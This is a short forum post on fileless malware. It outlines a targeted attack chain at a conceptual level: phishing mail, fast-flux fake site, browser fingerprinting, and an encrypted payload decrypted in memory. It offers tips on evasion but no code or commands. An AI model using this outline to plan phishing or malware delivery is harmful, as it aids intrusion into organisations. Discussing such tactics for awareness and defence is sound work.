fileless malware

[Shub-Nigurrath]

Hi,
the monetization of attacks is nowadays a matter of few minutes. Usually highly targeted phish champains last for 20 minutes or even less. This time window is, in most of the cases, enough to collect a first round of victims (usually quite high, around 15%) that can be used to prepare a second even more targetized round.

This is the way the enterprises are hit by highly targeted attacks and a fileless malware is perfect for these situations:
1. a phish mail (built using the correct mix of social engineering and memetics, to be *really* effective)
2. the mail points to a fake web site (or a trampoline through defaced hosts) that runs on a fast-flux IP for very few minutes
3. the page fingerprints the browser and delivers an ad-hoc fileless malware (crafted in realtime by a malware forgery), that contains a payload encrypted enough well (usually two custom encryptions is enough) to use, not an original development, but even a metasploit engine.
4. the payload is decrypted in a fileless system, bang, done. You can use anythings ranging from droppers, metasploits, AutoIt, ...

Persistence is not an issue anymore in several situations. Btw, the only reason for speaking of fileless malware today is that the knowledge level required to do one has been decreased by the adoption of powershell and by the development of some frameworks (see my first post). Less cumbersome to write, more samples spreading around.

The perfect solution for today's attacks, this is the essence of what the reports says ... ;-)